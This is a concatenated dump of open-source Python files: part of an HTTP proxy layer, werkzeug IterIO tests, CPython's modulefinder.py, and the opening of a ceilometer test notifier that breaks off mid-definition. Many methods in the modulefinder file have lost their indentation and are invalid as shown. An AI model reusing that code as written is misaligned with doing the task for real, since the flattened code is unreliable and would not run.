                # we can safely set it as the final attribute value here.
                f.server_conn = self.server_conn
            else:
                # response was set by an inline script.
                # we now need to emulate the responseheaders hook.
                self.channel.ask("responseheaders", f)
            self.log("response", "debug", [repr(f.response)])
            self.channel.ask("response", f)
            if not f.response.stream:
                # no streaming:
                # we already received the full response from the server and can
                # send it to the client straight away.
                self.send_response(f.response)
            else:
                # streaming:
                # First send the headers and then transfer the response incrementally
                self.send_response_headers(f.response)
                chunks = self.read_response_body(
                    f.request,
                    f.response
                )
                if callable(f.response.stream):
                    chunks = f.response.stream(chunks)
                self.send_response_body(f.response, chunks)
                f.response.timestamp_end = time.time()
            if self.check_close_connection(f):
                return False
            # Handle 101 Switching Protocols
            if f.response.status_code == 101:
                # Handle a successful HTTP 101 Switching Protocols Response,
                # received after e.g. a WebSocket upgrade request.
                # Check for WebSocket handshake
                is_websocket = (
                    websockets.check_handshake(f.request.headers) and
                    websockets.check_handshake(f.response.headers)
                )
                if is_websocket and not self.config.options.websocket:
                    self.log(
                        "Client requested WebSocket connection, but the protocol is disabled.",
                        "info"
                    )
                if is_websocket and self.config.options.websocket:
                    layer = WebSocketLayer(self, f)
                else:
                    layer = self.ctx.next_layer(self)
                layer()
                return False  # should never be reached
        except (exceptions.ProtocolException, exceptions.NetlibException) as e:
            self.send_error_response(502, repr(e))
            if not f.response:
                f.error = flow.Error(str(e))
                self.channel.ask("error", f)
                return False
            else:
                raise exceptions.ProtocolException(
                    "Error in HTTP connection: %s" % repr(e)
                )
        finally:
            if f:
                f.live = False
        return True
    def send_error_response(self, code, message, headers=None) -> None:
        """Best-effort: send an error response to the client; failures to
        deliver it are logged and swallowed."""
        try:
            response = http.make_error_response(code, message, headers)
            self.send_response(response)
        except (exceptions.NetlibException, h2.exceptions.H2Error, exceptions.Http2ProtocolException):
            self.log("Failed to send error response to client: {}".format(message), "debug")
    def change_upstream_proxy_server(self, address):
        """Switch the upstream proxy used for subsequent requests."""
        # Make set_upstream_proxy_server always available,
        # even if there's no UpstreamConnectLayer
        if hasattr(self.ctx, "change_upstream_proxy_server"):
            self.ctx.change_upstream_proxy_server(address)
        elif address != self.server_conn.address:
            self.log("Changing upstream proxy to {} (not CONNECTed)".format(repr(address)), "debug")
            self.set_server(address)
    def establish_server_connection(self, host: str, port: int, scheme: str):
        """Ensure a server connection to (host, port) exists, replacing a
        mismatched one in regular/transparent mode."""
        tls = (scheme == "https")
        if self.mode is HTTPMode.regular or self.mode is HTTPMode.transparent:
            # If there's an existing connection that doesn't match our expectations, kill it.
            address = (host, port)
            if address != self.server_conn.address or tls != self.server_tls:
                self.set_server(address)
                self.set_server_tls(tls, address[0])
            # Establish connection if necessary.
            if not self.server_conn.connected():
                self.connect()
        else:
            if not self.server_conn.connected():
                self.connect()
            if tls:
                raise exceptions.HttpProtocolException("Cannot change scheme in upstream proxy mode.")
| mit |
MissCatLady/AlarmEZ | venv/lib/python2.7/site-packages/werkzeug/testsuite/contrib/iterio.py | 146 | 6123 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.iterio
~~~~~~~~~~~~~~~~~~~~~~~~~
Tests the iterio object.
:copyright: (c) 2014 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import unittest
from functools import partial
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.contrib.iterio import IterIO, greenlet
class IterOTestSuite(WerkzeugTestCase):
    """Tests for IterIO used in pull mode (a readable file-like object
    backed by an iterable of chunks)."""
    def test_basic_native(self):
        """read/seek/tell/readline behavior over native-str chunks."""
        io = IterIO(["Hello", "World", "1", "2", "3"])
        self.assert_equal(io.tell(), 0)
        self.assert_equal(io.read(2), "He")
        self.assert_equal(io.tell(), 2)
        self.assert_equal(io.read(3), "llo")
        self.assert_equal(io.tell(), 5)
        io.seek(0)
        self.assert_equal(io.read(5), "Hello")
        self.assert_equal(io.tell(), 5)
        self.assert_equal(io._buf, "Hello")
        self.assert_equal(io.read(), "World123")
        self.assert_equal(io.tell(), 13)
        io.close()
        assert io.closed
        io = IterIO(["Hello\n", "World!"])
        self.assert_equal(io.readline(), 'Hello\n')
        self.assert_equal(io._buf, 'Hello\n')
        self.assert_equal(io.read(), 'World!')
        self.assert_equal(io._buf, 'Hello\nWorld!')
        self.assert_equal(io.tell(), 12)
        io.seek(0)
        self.assert_equal(io.readlines(), ['Hello\n', 'World!'])
        io = IterIO(["foo\n", "bar"])
        io.seek(-4, 2)
        self.assert_equal(io.read(4), '\nbar')
        # Invalid whence value must raise IOError.
        self.assert_raises(IOError, io.seek, 2, 100)
        io.close()
        # Reading a closed IterIO must raise ValueError.
        self.assert_raises(ValueError, io.read)
    def test_basic_bytes(self):
        """Same behavior as test_basic_native, but over bytes chunks."""
        io = IterIO([b"Hello", b"World", b"1", b"2", b"3"])
        self.assert_equal(io.tell(), 0)
        self.assert_equal(io.read(2), b"He")
        self.assert_equal(io.tell(), 2)
        self.assert_equal(io.read(3), b"llo")
        self.assert_equal(io.tell(), 5)
        io.seek(0)
        self.assert_equal(io.read(5), b"Hello")
        self.assert_equal(io.tell(), 5)
        self.assert_equal(io._buf, b"Hello")
        self.assert_equal(io.read(), b"World123")
        self.assert_equal(io.tell(), 13)
        io.close()
        assert io.closed
        io = IterIO([b"Hello\n", b"World!"])
        self.assert_equal(io.readline(), b'Hello\n')
        self.assert_equal(io._buf, b'Hello\n')
        self.assert_equal(io.read(), b'World!')
        self.assert_equal(io._buf, b'Hello\nWorld!')
        self.assert_equal(io.tell(), 12)
        io.seek(0)
        self.assert_equal(io.readlines(), [b'Hello\n', b'World!'])
        io = IterIO([b"foo\n", b"bar"])
        io.seek(-4, 2)
        self.assert_equal(io.read(4), b'\nbar')
        self.assert_raises(IOError, io.seek, 2, 100)
        io.close()
        self.assert_raises(ValueError, io.read)
    def test_basic_unicode(self):
        """Same behavior as test_basic_native, but over unicode chunks."""
        io = IterIO([u"Hello", u"World", u"1", u"2", u"3"])
        self.assert_equal(io.tell(), 0)
        self.assert_equal(io.read(2), u"He")
        self.assert_equal(io.tell(), 2)
        self.assert_equal(io.read(3), u"llo")
        self.assert_equal(io.tell(), 5)
        io.seek(0)
        self.assert_equal(io.read(5), u"Hello")
        self.assert_equal(io.tell(), 5)
        self.assert_equal(io._buf, u"Hello")
        self.assert_equal(io.read(), u"World123")
        self.assert_equal(io.tell(), 13)
        io.close()
        assert io.closed
        io = IterIO([u"Hello\n", u"World!"])
        self.assert_equal(io.readline(), u'Hello\n')
        self.assert_equal(io._buf, u'Hello\n')
        self.assert_equal(io.read(), u'World!')
        self.assert_equal(io._buf, u'Hello\nWorld!')
        self.assert_equal(io.tell(), 12)
        io.seek(0)
        self.assert_equal(io.readlines(), [u'Hello\n', u'World!'])
        io = IterIO([u"foo\n", u"bar"])
        io.seek(-4, 2)
        self.assert_equal(io.read(4), u'\nbar')
        self.assert_raises(IOError, io.seek, 2, 100)
        io.close()
        self.assert_raises(ValueError, io.read)
    def test_sentinel_cases(self):
        """Empty iterables: the sentinel argument decides the string type
        of the (empty) result for read() and readline()."""
        io = IterIO([])
        self.assert_strict_equal(io.read(), '')
        io = IterIO([], b'')
        self.assert_strict_equal(io.read(), b'')
        io = IterIO([], u'')
        self.assert_strict_equal(io.read(), u'')
        io = IterIO([])
        self.assert_strict_equal(io.read(), '')
        io = IterIO([b''])
        self.assert_strict_equal(io.read(), b'')
        io = IterIO([u''])
        self.assert_strict_equal(io.read(), u'')
        io = IterIO([])
        self.assert_strict_equal(io.readline(), '')
        io = IterIO([], b'')
        self.assert_strict_equal(io.readline(), b'')
        io = IterIO([], u'')
        self.assert_strict_equal(io.readline(), u'')
        io = IterIO([])
        self.assert_strict_equal(io.readline(), '')
        io = IterIO([b''])
        self.assert_strict_equal(io.readline(), b'')
        io = IterIO([u''])
        self.assert_strict_equal(io.readline(), u'')
class IterITestSuite(WerkzeugTestCase):
    """Tests for IterIO in push mode (wrapping a greenlet-based producer
    callable; only run when the greenlet package is available)."""
    def test_basic(self):
        """Writes become stream chunks; flush() delimits chunk boundaries."""
        def producer(out):
            out.write('1\n')
            out.write('2\n')
            out.flush()
            out.write('3\n')
        iterable = IterIO(producer)
        self.assert_equal(next(iterable), '1\n2\n')
        self.assert_equal(next(iterable), '3\n')
        self.assert_raises(StopIteration, next, iterable)
    def test_sentinel_cases(self):
        """Producers that write nothing: flush yields an empty chunk of the
        sentinel's type; no activity at all raises StopIteration."""
        def producer_dummy_flush(out):
            out.flush()
        iterable = IterIO(producer_dummy_flush)
        self.assert_strict_equal(next(iterable), '')
        def producer_empty(out):
            pass
        iterable = IterIO(producer_empty)
        self.assert_raises(StopIteration, next, iterable)
        iterable = IterIO(producer_dummy_flush, b'')
        self.assert_strict_equal(next(iterable), b'')
        iterable = IterIO(producer_dummy_flush, u'')
        self.assert_strict_equal(next(iterable), u'')
def suite():
    """Build the iterio test suite; greenlet-backed tests are included
    only when the greenlet package is importable."""
    cases = [IterOTestSuite]
    if greenlet is not None:
        cases.append(IterITestSuite)
    result = unittest.TestSuite()
    for case in cases:
        result.addTest(unittest.makeSuite(case))
    return result
| mit |
kemalakyol48/python-for-android | python3-alpha/python3-src/Lib/modulefinder.py | 50 | 24112 | """Find modules used by a script, using introspection."""
from __future__ import generators
import dis
import imp
import marshal
import os
import sys
import types
import struct
# File mode used when opening source files for scanning
# (universal-newline text mode).
READ_MODE = "rU"
# XXX Clean up once str8's cstor matches bytes.
# One-byte opcode constants, looked up by name so they always match the
# running interpreter's opcode numbering.
LOAD_CONST = bytes([dis.opname.index('LOAD_CONST')])
IMPORT_NAME = bytes([dis.opname.index('IMPORT_NAME')])
STORE_NAME = bytes([dis.opname.index('STORE_NAME')])
STORE_GLOBAL = bytes([dis.opname.index('STORE_GLOBAL')])
# Opcodes that bind a name at module/global scope.
STORE_OPS = [STORE_NAME, STORE_GLOBAL]
HAVE_ARGUMENT = bytes([dis.HAVE_ARGUMENT])
# Modulefinder does a good job at simulating Python's, but it can not
# handle __path__ modifications packages make at runtime. Therefore there
# is a mechanism whereby you can register extra paths in this map for a
# package, and it will be honored.

# Maps package names to lists of extra search paths.
packagePathMap = {}


# A Public interface
def AddPackagePath(packagename, path):
    """Register an extra search *path* for *packagename*."""
    packagePathMap.setdefault(packagename, []).append(path)
replacePackageMap = {}
# This ReplacePackage mechanism allows modulefinder to work around
# situations in which a package injects itself under the name
# of another package into sys.modules at runtime by calling
# ReplacePackage("real_package_name", "faked_package_name")
# before running ModuleFinder.
def ReplacePackage(oldname, newname):
    # Record that imports of `oldname` should be treated as `newname`
    # (consulted in ModuleFinder.load_package).
    replacePackageMap[oldname] = newname
class Module:
    """Bookkeeping record for one module discovered by ModuleFinder."""

    def __init__(self, name, file=None, path=None):
        self.__name__ = name
        self.__file__ = file
        self.__path__ = path    # list of dirs if this is a package, else None
        self.__code__ = None    # compiled code object, set by the finder
        # Global names assigned in the module, including names brought in
        # through star-imports of other Python modules.
        self.globalnames = {}
        # Star-imports this module did that could not be resolved, i.e. a
        # star-import from a non-Python module.
        self.starimports = {}

    def __repr__(self):
        pieces = ["Module(%r" % (self.__name__,)]
        if self.__file__ is not None:
            pieces.append(", %r" % (self.__file__,))
        if self.__path__ is not None:
            pieces.append(", %r" % (self.__path__,))
        pieces.append(")")
        return "".join(pieces)
class ModuleFinder:
def __init__(self, path=None, debug=0, excludes=[], replace_paths=[]):
if path is None:
path = sys.path
self.path = path
self.modules = {}
self.badmodules = {}
self.debug = debug
self.indent = 0
self.excludes = excludes
self.replace_paths = replace_paths
self.processed_paths = [] # Used in debugging only
def msg(self, level, str, *args):
if level <= self.debug:
for i in range(self.indent):
print(" ", end=' ')
print(str, end=' ')
for arg in args:
print(repr(arg), end=' ')
print()
def msgin(self, *args):
level = args[0]
if level <= self.debug:
self.indent = self.indent + 1
self.msg(*args)
def msgout(self, *args):
level = args[0]
if level <= self.debug:
self.indent = self.indent - 1
self.msg(*args)
    def run_script(self, pathname):
        """Load `pathname` as the __main__ module and scan its imports."""
        self.msg(2, "run_script", pathname)
        with open(pathname, READ_MODE) as fp:
            # (suffix, mode, type) description triple as returned by
            # imp.find_module.
            stuff = ("", "r", imp.PY_SOURCE)
            self.load_module('__main__', fp, pathname, stuff)
    def load_file(self, pathname):
        """Load a single source file, named after its basename (the file
        need not be on self.path)."""
        dir, name = os.path.split(pathname)
        name, ext = os.path.splitext(name)
        with open(pathname, READ_MODE) as fp:
            stuff = (ext, "r", imp.PY_SOURCE)
            self.load_module(name, fp, pathname, stuff)
    def import_hook(self, name, caller=None, fromlist=None, level=-1):
        """Simulate an import statement executed by `caller`.

        Mirrors __import__ semantics: without a fromlist the head package
        is returned; with one, the named submodules are ensured instead.
        """
        self.msg(3, "import_hook", name, caller, fromlist, level)
        parent = self.determine_parent(caller, level=level)
        q, tail = self.find_head_package(parent, name)
        m = self.load_tail(q, tail)
        if not fromlist:
            return q
        if m.__path__:
            # Only packages can have submodules named in a fromlist.
            self.ensure_fromlist(m, fromlist)
        return None
    def determine_parent(self, caller, level=-1):
        """Return the package Module that an import in `caller` is relative
        to, or None for an absolute/top-level import.

        `level` follows __import__: 0 means absolute, >= 1 is the number of
        leading dots of a relative import, -1 is classic (implicit) semantics.
        """
        self.msgin(4, "determine_parent", caller, level)
        if not caller or level == 0:
            self.msgout(4, "determine_parent -> None")
            return None
        pname = caller.__name__
        if level >= 1: # relative import
            if caller.__path__:
                # A package is its own starting point, consuming one dot.
                level -= 1
            if level == 0:
                parent = self.modules[pname]
                assert parent is caller
                self.msgout(4, "determine_parent ->", parent)
                return parent
            if pname.count(".") < level:
                raise ImportError("relative importpath too deep")
            # Strip one trailing name component per remaining dot.
            pname = ".".join(pname.split(".")[:-level])
            parent = self.modules[pname]
            self.msgout(4, "determine_parent ->", parent)
            return parent
        if caller.__path__:
            # Classic semantics: a package is its own parent.
            parent = self.modules[pname]
            assert caller is parent
            self.msgout(4, "determine_parent ->", parent)
            return parent
        if '.' in pname:
            # Classic semantics: a submodule's parent is its package.
            i = pname.rfind('.')
            pname = pname[:i]
            parent = self.modules[pname]
            assert parent.__name__ == pname
            self.msgout(4, "determine_parent ->", parent)
            return parent
        self.msgout(4, "determine_parent -> None")
        return None
def find_head_package(self, parent, name):
self.msgin(4, "find_head_package", parent, name)
if '.' in name:
i = name.find('.')
head = name[:i]
tail = name[i+1:]
else:
head = name
tail = ""
if parent:
qname = "%s.%s" % (parent.__name__, head)
else:
qname = head
q = self.import_module(head, qname, parent)
if q:
self.msgout(4, "find_head_package ->", (q, tail))
return q, tail
if parent:
qname = head
parent = None
q = self.import_module(head, qname, parent)
if q:
self.msgout(4, "find_head_package ->", (q, tail))
return q, tail
self.msgout(4, "raise ImportError: No module named", qname)
raise ImportError("No module named " + qname)
def load_tail(self, q, tail):
self.msgin(4, "load_tail", q, tail)
m = q
while tail:
i = tail.find('.')
if i < 0: i = len(tail)
head, tail = tail[:i], tail[i+1:]
mname = "%s.%s" % (m.__name__, head)
m = self.import_module(head, mname, m)
if not m:
self.msgout(4, "raise ImportError: No module named", mname)
raise ImportError("No module named " + mname)
self.msgout(4, "load_tail ->", m)
return m
    def ensure_fromlist(self, m, fromlist, recursive=0):
        """Import every submodule of package `m` named in `fromlist`.

        A "*" entry expands to all discoverable submodules; `recursive`
        guards against re-expanding "*" inside that expansion.
        """
        self.msg(4, "ensure_fromlist", m, fromlist, recursive)
        for sub in fromlist:
            if sub == "*":
                if not recursive:
                    all = self.find_all_submodules(m)
                    if all:
                        self.ensure_fromlist(m, all, 1)
            elif not hasattr(m, sub):
                # Names already set as attributes (e.g. plain globals of the
                # package) need no import.
                subname = "%s.%s" % (m.__name__, sub)
                submod = self.import_module(sub, subname, m)
                if not submod:
                    raise ImportError("No module named " + subname)
    def find_all_submodules(self, m):
        """Return the names of every submodule found in package `m`'s
        directories (None for a non-package)."""
        if not m.__path__:
            return
        modules = {}
        # 'suffixes' used to be a list hardcoded to [".py", ".pyc", ".pyo"].
        # But we must also collect Python extension modules - although
        # we cannot separate normal dlls from Python extensions.
        suffixes = []
        for triple in imp.get_suffixes():
            suffixes.append(triple[0])
        for dir in m.__path__:
            try:
                names = os.listdir(dir)
            except os.error:
                self.msg(2, "can't list directory", dir)
                continue
            for name in names:
                mod = None
                for suff in suffixes:
                    # Strip the first matching suffix to get the module name.
                    n = len(suff)
                    if name[-n:] == suff:
                        mod = name[:-n]
                        break
                if mod and mod != "__init__":
                    modules[mod] = mod
        return modules.keys()
    def import_module(self, partname, fqname, parent):
        """Import one module; return its Module record or None on failure.

        Successes are cached in self.modules and failures in
        self.badmodules, so each fully-qualified name is resolved once.
        """
        self.msgin(3, "import_module", partname, fqname, parent)
        try:
            m = self.modules[fqname]
        except KeyError:
            pass
        else:
            self.msgout(3, "import_module ->", m)
            return m
        if fqname in self.badmodules:
            self.msgout(3, "import_module -> None")
            return None
        if parent and parent.__path__ is None:
            # Parent is not a package, so it cannot contain submodules.
            self.msgout(3, "import_module -> None")
            return None
        try:
            fp, pathname, stuff = self.find_module(partname,
                                                   parent and parent.__path__, parent)
        except ImportError:
            self.msgout(3, "import_module ->", None)
            return None
        try:
            m = self.load_module(fqname, fp, pathname, stuff)
        finally:
            if fp: fp.close()
        if parent:
            # Make the submodule visible as an attribute of its package.
            setattr(parent, partname, m)
        self.msgout(3, "import_module ->", m)
        return m
    def load_module(self, fqname, fp, pathname, file_info):
        """Compile or unmarshal one module's code, register it as `fqname`
        and scan it for further imports.

        `file_info` is the (suffix, mode, type) triple from find_module.
        """
        suffix, mode, type = file_info
        self.msgin(2, "load_module", fqname, fp and "fp", pathname)
        if type == imp.PKG_DIRECTORY:
            m = self.load_package(fqname, pathname)
            self.msgout(2, "load_module ->", m)
            return m
        if type == imp.PY_SOURCE:
            co = compile(fp.read()+'\n', pathname, 'exec')
        elif type == imp.PY_COMPILED:
            if fp.read(4) != imp.get_magic():
                self.msgout(2, "raise ImportError: Bad magic number", pathname)
                raise ImportError("Bad magic number in %s" % pathname)
            # Skip the remaining 4-byte header field before the marshalled
            # code (the source timestamp in this .pyc format).
            fp.read(4)
            co = marshal.load(fp)
        else:
            # Extension module or builtin: nothing to scan.
            co = None
        m = self.add_module(fqname)
        m.__file__ = pathname
        if co:
            if self.replace_paths:
                co = self.replace_paths_in_code(co)
            m.__code__ = co
            self.scan_code(co, m)
        self.msgout(2, "load_module ->", m)
        return m
def _add_badmodule(self, name, caller):
if name not in self.badmodules:
self.badmodules[name] = {}
if caller:
self.badmodules[name][caller.__name__] = 1
else:
self.badmodules[name]["-"] = 1
    def _safe_import_hook(self, name, caller, fromlist, level=-1):
        # wrapper for self.import_hook() that won't raise ImportError
        if name in self.badmodules:
            self._add_badmodule(name, caller)
            return
        try:
            self.import_hook(name, caller, level=level)
        except ImportError as msg:
            self.msg(2, "ImportError:", str(msg))
            self._add_badmodule(name, caller)
        else:
            if fromlist:
                for sub in fromlist:
                    if sub in self.badmodules:
                        self._add_badmodule(sub, caller)
                        continue
                    try:
                        # Import each fromlist entry separately so one bad
                        # submodule does not mask the others.
                        self.import_hook(name, caller, [sub], level=level)
                    except ImportError as msg:
                        self.msg(2, "ImportError:", str(msg))
                        fullname = name + "." + sub
                        self._add_badmodule(fullname, caller)
    def scan_opcodes(self, co,
                     unpack = struct.unpack):
        # Scan the code, and yield 'interesting' opcode combinations
        # Version for Python 2.4 and older
        # NOTE(review): only selected by scan_code for interpreters < 2.5;
        # under Python 3 code[0] is an int while STORE_OPS/HAVE_ARGUMENT are
        # bytes, so these comparisons would never match -- confirm this path
        # is indeed dead on Python 3.
        code = co.co_code
        names = co.co_names
        consts = co.co_consts
        while code:
            c = code[0]
            if c in STORE_OPS:
                # STORE_NAME/STORE_GLOBAL: a global name is being bound.
                oparg, = unpack('<H', code[1:3])
                yield "store", (names[oparg],)
                code = code[3:]
                continue
            if c == LOAD_CONST and code[3] == IMPORT_NAME:
                # LOAD_CONST (fromlist) directly followed by IMPORT_NAME.
                oparg_1, oparg_2 = unpack('<xHxH', code[:6])
                yield "import", (consts[oparg_1], names[oparg_2])
                code = code[6:]
                continue
            # Skip the instruction: 3 bytes with argument, 1 without.
            if c >= HAVE_ARGUMENT:
                code = code[3:]
            else:
                code = code[1:]
    def scan_opcodes_25(self, co,
                        unpack = struct.unpack):
        # Scan the code, and yield 'interesting' opcode combinations
        # Python 2.5 version (has absolute and relative imports)
        code = co.co_code
        names = co.co_names
        consts = co.co_consts
        # An import compiles to LOAD_CONST (level), LOAD_CONST (fromlist),
        # IMPORT_NAME (module name).
        LOAD_LOAD_AND_IMPORT = LOAD_CONST + LOAD_CONST + IMPORT_NAME
        while code:
            c = bytes([code[0]])
            if c in STORE_OPS:
                oparg, = unpack('<H', code[1:3])
                yield "store", (names[oparg],)
                code = code[3:]
                continue
            # code[:9:3] picks out the three opcode bytes of the next three
            # 3-byte instructions for a single comparison.
            if code[:9:3] == LOAD_LOAD_AND_IMPORT:
                oparg_1, oparg_2, oparg_3 = unpack('<xHxHxH', code[:9])
                level = consts[oparg_1]
                if level == 0: # absolute import
                    yield "absolute_import", (consts[oparg_2], names[oparg_3])
                else: # relative import
                    yield "relative_import", (level, consts[oparg_2], names[oparg_3])
                code = code[9:]
                continue
            if c >= HAVE_ARGUMENT:
                code = code[3:]
            else:
                code = code[1:]
    def scan_code(self, co, m):
        """Walk code object `co`, recording global stores and simulating the
        imports it performs, attributing everything to module `m`."""
        code = co.co_code
        if sys.version_info >= (2, 5):
            scanner = self.scan_opcodes_25
        else:
            scanner = self.scan_opcodes
        for what, args in scanner(co):
            if what == "store":
                name, = args
                m.globalnames[name] = 1
            elif what == "absolute_import":
                fromlist, name = args
                have_star = 0
                if fromlist is not None:
                    if "*" in fromlist:
                        have_star = 1
                    fromlist = [f for f in fromlist if f != "*"]
                self._safe_import_hook(name, m, fromlist, level=0)
                if have_star:
                    # We've encountered an "import *". If it is a Python module,
                    # the code has already been parsed and we can suck out the
                    # global names.
                    mm = None
                    if m.__path__:
                        # At this point we don't know whether 'name' is a
                        # submodule of 'm' or a global module. Let's just try
                        # the full name first.
                        mm = self.modules.get(m.__name__ + "." + name)
                    if mm is None:
                        mm = self.modules.get(name)
                    if mm is not None:
                        m.globalnames.update(mm.globalnames)
                        m.starimports.update(mm.starimports)
                        if mm.__code__ is None:
                            # Non-Python source: star-import unresolvable.
                            m.starimports[name] = 1
                    else:
                        m.starimports[name] = 1
            elif what == "relative_import":
                level, fromlist, name = args
                if name:
                    self._safe_import_hook(name, m, fromlist, level=level)
                else:
                    # "from . import x" style: import from the parent package.
                    parent = self.determine_parent(m, level=level)
                    self._safe_import_hook(parent.__name__, None, fromlist, level=0)
            else:
                # We don't expect anything else from the generator.
                raise RuntimeError(what)
        for c in co.co_consts:
            if isinstance(c, type(co)):
                # Recurse into nested function/class bodies.
                self.scan_code(c, m)
    def load_package(self, fqname, pathname):
        """Load a package directory: register it, set up __path__, then load
        its __init__ module."""
        self.msgin(2, "load_package", fqname, pathname)
        # Honor ReplacePackage() registrations (see module docstring above).
        newname = replacePackageMap.get(fqname)
        if newname:
            fqname = newname
        m = self.add_module(fqname)
        m.__file__ = pathname
        m.__path__ = [pathname]
        # As per comment at top of file, simulate runtime __path__ additions.
        m.__path__ = m.__path__ + packagePathMap.get(fqname, [])
        fp, buf, stuff = self.find_module("__init__", m.__path__)
        try:
            self.load_module(fqname, fp, buf, stuff)
            self.msgout(2, "load_package ->", m)
            return m
        finally:
            if fp:
                fp.close()
def add_module(self, fqname):
if fqname in self.modules:
return self.modules[fqname]
self.modules[fqname] = m = Module(fqname)
return m
    def find_module(self, name, path, parent=None):
        """Locate `name` on `path`; return (file, pathname, description).

        Raises ImportError for names in self.excludes; built-in modules are
        reported with a C_BUILTIN description and no open file.
        """
        if parent is not None:
            # assert path is not None
            fullname = parent.__name__+'.'+name
        else:
            fullname = name
        if fullname in self.excludes:
            self.msgout(3, "find_module -> Excluded", fullname)
            raise ImportError(name)
        if path is None:
            if name in sys.builtin_module_names:
                return (None, None, ("", "", imp.C_BUILTIN))
            path = self.path
        return imp.find_module(name, path)
def report(self):
"""Print a report to stdout, listing the found modules with their
paths, as well as modules that are missing, or seem to be missing.
"""
print()
print(" %-25s %s" % ("Name", "File"))
print(" %-25s %s" % ("----", "----"))
# Print modules found
keys = sorted(self.modules.keys())
for key in keys:
m = self.modules[key]
if m.__path__:
print("P", end=' ')
else:
print("m", end=' ')
print("%-25s" % key, m.__file__ or "")
# Print missing modules
missing, maybe = self.any_missing_maybe()
if missing:
print()
print("Missing modules:")
for name in missing:
mods = sorted(self.badmodules[name].keys())
print("?", name, "imported from", ', '.join(mods))
# Print modules that may be missing, but then again, maybe not...
if maybe:
print()
print("Submodules thay appear to be missing, but could also be", end=' ')
print("global names in the parent package:")
for name in maybe:
mods = sorted(self.badmodules[name].keys())
print("?", name, "imported from", ', '.join(mods))
def any_missing(self):
"""Return a list of modules that appear to be missing. Use
any_missing_maybe() if you want to know which modules are
certain to be missing, and which *may* be missing.
"""
missing, maybe = self.any_missing_maybe()
return missing + maybe
    def any_missing_maybe(self):
        """Return two lists, one with modules that are certainly missing
        and one with modules that *may* be missing. The latter names could
        either be submodules *or* just global names in the package.
        The reason it can't always be determined is that it's impossible to
        tell which names are imported when "from module import *" is done
        with an extension module, short of actually importing it.
        """
        missing = []
        maybe = []
        for name in self.badmodules:
            if name in self.excludes:
                # Deliberately excluded names are not reported.
                continue
            i = name.rfind(".")
            if i < 0:
                # Top-level name that failed to import: definitely missing.
                missing.append(name)
                continue
            subname = name[i+1:]
            pkgname = name[:i]
            pkg = self.modules.get(pkgname)
            if pkg is not None:
                if pkgname in self.badmodules[name]:
                    # The package tried to import this module itself and
                    # failed. It's definitely missing.
                    missing.append(name)
                elif subname in pkg.globalnames:
                    # It's a global in the package: definitely not missing.
                    pass
                elif pkg.starimports:
                    # It could be missing, but the package did an "import *"
                    # from a non-Python module, so we simply can't be sure.
                    maybe.append(name)
                else:
                    # It's not a global in the package, the package didn't
                    # do funny star imports, it's very likely to be missing.
                    # The symbol could be inserted into the package from the
                    # outside, but since that's not good style we simply list
                    # it missing.
                    missing.append(name)
            else:
                missing.append(name)
        missing.sort()
        maybe.sort()
        return missing, maybe
    def replace_paths_in_code(self, co):
        """Return a copy of code object `co` with co_filename rewritten
        according to self.replace_paths, recursing into nested code consts."""
        new_filename = original_filename = os.path.normpath(co.co_filename)
        for f, r in self.replace_paths:
            # First matching (old, new) prefix pair wins.
            if original_filename.startswith(f):
                new_filename = r + original_filename[len(f):]
                break
        if self.debug and original_filename not in self.processed_paths:
            if new_filename != original_filename:
                self.msgout(2, "co_filename %r changed to %r" \
                                    % (original_filename,new_filename,))
            else:
                self.msgout(2, "co_filename %r remains unchanged" \
                                    % (original_filename,))
            self.processed_paths.append(original_filename)
        consts = list(co.co_consts)
        for i in range(len(consts)):
            if isinstance(consts[i], type(co)):
                # Nested functions/classes carry their own code objects.
                consts[i] = self.replace_paths_in_code(consts[i])
        # NOTE(review): this CodeType argument list matches the interpreter
        # version this file shipped with; newer CPythons require extra
        # arguments (e.g. kwonlyargcount) -- confirm before reusing.
        return types.CodeType(co.co_argcount, co.co_nlocals, co.co_stacksize,
                              co.co_flags, co.co_code, tuple(consts), co.co_names,
                              co.co_varnames, new_filename, co.co_name,
                              co.co_firstlineno, co.co_lnotab,
                              co.co_freevars, co.co_cellvars)
def test():
    """Command-line driver.

    Usage: modulefinder.py [-d|-q] [-m] [-p path] [-x exclude] script [args]
    Returns the ModuleFinder instance (handy under python -i).
    """
    # Parse command line
    import getopt
    try:
        opts, args = getopt.getopt(sys.argv[1:], "dmp:qx:")
    except getopt.error as msg:
        print(msg)
        return
    # Process options
    debug = 1
    domods = 0
    addpath = []
    exclude = []
    for o, a in opts:
        if o == '-d':
            debug = debug + 1
        if o == '-m':
            domods = 1
        if o == '-p':
            addpath = addpath + a.split(os.pathsep)
        if o == '-q':
            debug = 0
        if o == '-x':
            exclude.append(a)
    # Provide default arguments
    if not args:
        script = "hello.py"
    else:
        script = args[0]
    # Set the path based on sys.path and the script directory
    path = sys.path[:]
    path[0] = os.path.dirname(script)
    path = addpath + path
    if debug > 1:
        print("path:")
        for item in path:
            print("   ", repr(item))
    # Create the module finder and turn its crank
    mf = ModuleFinder(path, debug, exclude)
    for arg in args[1:]:
        if arg == '-m':
            # Remaining arguments are module names, not files.
            domods = 1
            continue
        if domods:
            if arg[-2:] == '.*':
                mf.import_hook(arg[:-2], None, ["*"])
            else:
                mf.import_hook(arg)
        else:
            mf.load_file(arg)
    mf.run_script(script)
    mf.report()
    return mf  # for -i debugging
if __name__ == '__main__':
    # Run the CLI driver; allow Ctrl-C to exit without a traceback.
    try:
        mf = test()
    except KeyboardInterrupt:
        print("\n[interrupt]")
| apache-2.0 |
maestro-hybrid-cloud/ceilometer | ceilometer/alarm/notifier/test.py | 11 | 1257 | #
# Copyright 2013 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test alarm notifier."""
from ceilometer.alarm import notifier
class TestAlarmNotifier(notifier.AlarmNotifier):
    """Test alarm notifier."""
    # Fixed malformed docstring: the original read `"Test alarm
    # notifier."""` (missing the opening triple quote).

    def __init__(self):
        # Collected (action, alarm_id, alarm_name, severity, previous,
        # current, reason, reason_data) tuples, in call order.
        self.notifications = []

    def notify(self, action, alarm_id, alarm_name, severity,
